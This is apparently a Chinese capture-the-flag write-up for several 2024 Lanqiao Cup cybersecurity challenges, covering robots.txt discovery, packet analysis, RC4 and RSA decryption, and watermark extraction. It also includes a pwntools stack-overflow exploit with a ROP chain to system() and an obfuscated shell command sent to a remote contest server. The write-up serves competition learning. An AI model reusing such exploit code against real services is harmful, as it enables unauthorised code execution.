2024第十五届蓝桥杯网络安全赛项部分题目 WriteUp
2024第十五届蓝桥杯网络安全赛项部分题目 WriteUp
爬虫协议
根据提示,访问/robots.txt,得到敏感路径 /38063b612387b10e22f4bd0d71a46a4e/,访问其中的/9de33df789dc91e984a091e6dce2dfb1得到flag。
flag{494547b4-f13f-47de-b1a5-a99f20495cd7}
packet
使用过滤器tcp contains "flag" 找到flag相关的包,追踪HTTP流得到返回数据ZmxhZ3s3ZDZmMTdhNC0yYjBhLTQ2N2QtOGE0Mi02Njc1MDM2OGMyNDl9Cg==,base64解码得到flag
flag{7d6f17a4-2b0a-467d-8a42-66750368c249}
cc
打开网页,可以获得密文、key和IV,直接使用工具解密:
rc4
根据提示可知为RC4加密,分析程序,猜测Str为密码,v5为密文,将v5转为unsigned char后利用脚本解密可得flag。
脚本:
import base64
def rc4_main(key = "init_key", message = "init_message"):
print("RC4解密主函数调用成功")
print('\n')
s_box = rc4_init_sbox(key)
crypt = rc4_excrypt(message, s_box)
return crypt
def rc4_init_sbox(key):
s_box = list(range(256))
print("原来的 s 盒:%s" % s_box)
print('\n')
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
print("混乱后的 s 盒:%s"% s_box)
print('\n')
return s_box
def rc4_excrypt(plain, box):
print("调用解密程序成功。")
print('\n')
plain = base64.b64decode(plain.encode('utf-8'))
plain = bytes.decode(plain)
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
print("res用于解密字符串,解密后是:%res" %res)
print('\n')
cipher = "".join(res)
print("解密后的字符串是:%s" %cipher)
print('\n')
print("解密后的输出(没经过任何编码):")
print('\n')
return cipher
a=[182,66,183,252,240,162,94,169,61,41,54,31,84,41,114,168,99,50,242,68,139,133,236,13,173,63,147,163,146,116,129,101,105,236,228,57,133,169,202,175,178,198] #cipher
key="gamelab@"
s=""
for i in a:
s+=chr(i)
s=str(base64.b64encode(s.encode('utf-8')), 'utf-8')
rc4_main(key, s)
得到flag:
解密后的字符串是:flag{12601b2b-2f1e-468a-ae43-92391ff76ef3}
缺失的数据
使用压缩包中的secret.txt作为字典破解压缩包中加密的a.png,然后利用题目附带的脚本稍作修改后运行:
import numpy as np
import cv2
import pywt
class WaterMarkDWT:
def __init__(self, origin: str, watermark: str, key: int, weight: list):
self.key = key
self.img = cv2.imread(origin)
self.mark = cv2.imread(watermark)
self.coef = weight
def arnold(self, img):
r, c = img.shape
p = np.zeros((r, c), np.uint8)
a, b = 1, 1
for k in range(self.key):
for i in range(r):
for j in range(c):
x = (i + b * j) % r
y = (a * i + (a * b + 1) * j) % c
p[x, y] = img[i, j]
return p
def deArnold(self, img):
r, c = img.shape
p = np.zeros((r, c), np.uint8)
a, b = 1, 1
for k in range(self.key):
for i in range(r):
for j in range(c):
x = ((a * b + 1) * i - b * j) % r
y = (-a * i + j) % c
p[x, y] = img[i, j]
return p
def get(self, size: tuple = (1200, 1200), flag: int = None):
img = cv2.resize(self.img, size)
img1 = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
img2 = cv2.cvtColor(self.mark, cv2.COLOR_RGB2GRAY)
c = pywt.wavedec2(img2, 'db2', level=3)
[cl, (cH3, cV3, cD3), (cH2, cV2, cD2), (cH1, cV1, cD1)] = c
d = pywt.wavedec2(img1, 'db2', level=3)
[dl, (dH3, dV3, dD3), (dH2, dV2, dD2), (dH1, dV1, dD1)] = d
a1, a2, a3, a4 = self.coef
ca1 = (cl - dl) * a1
ch1 = (cH3 - dH3) * a2
cv1 = (cV3 - dV3) * a3
cd1 = (cD3 - dD3) * a4
waterImg = pywt.waverec2([ca1, (ch1, cv1, cd1)], 'db2')
waterImg = np.array(waterImg, np.uint8)
waterImg = self.deArnold(waterImg)
kernel = np.ones((3, 3), np.uint8)
if flag == 0:
waterImg = cv2.erode(waterImg, kernel)
elif flag == 1:
waterImg = cv2.dilate(waterImg, kernel)
cv2.imwrite('水印.png', waterImg)
return waterImg
if __name__ == '__main__':
img = 'a.png'
waterImg = 'newImg.png'
k = 20
xs = [0.2, 0.2, 0.5, 0.4]
W1 = WaterMarkDWT(img, waterImg, k, xs)
W1.get()
得到 水印.png,打开可以看到flag。
fd
简单的栈溢出,但是要根据题目提示,将cat的输出返回到管道符2中,解题脚本如下:
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
from pwn import *
p = remote("47.93.142.153", 25722)
elf = ELF("/mnt/c/Users/崔志鹏/Desktop/临时/pwn")
start_address = 0x400862
ret_address = 0x04005ae
pop_rdi = 0x0400933
# 64位
context(arch="amd64",os="linux")
stack_len = 0x20 + 0x8
payload = b'\x00'*stack_len + p64(ret_address) + p64(pop_rdi) + p64(0x00601090) + p64(elf.plt['system'])
p.sendline(b"ca''t f*>&2")
p.sendline(payload)
p.interactive() #can can need
Theorem
题目脚本中p、q是相邻的素数,间距较小,利用工具中的费马分解得到p、q,随后即可得到私钥及明文。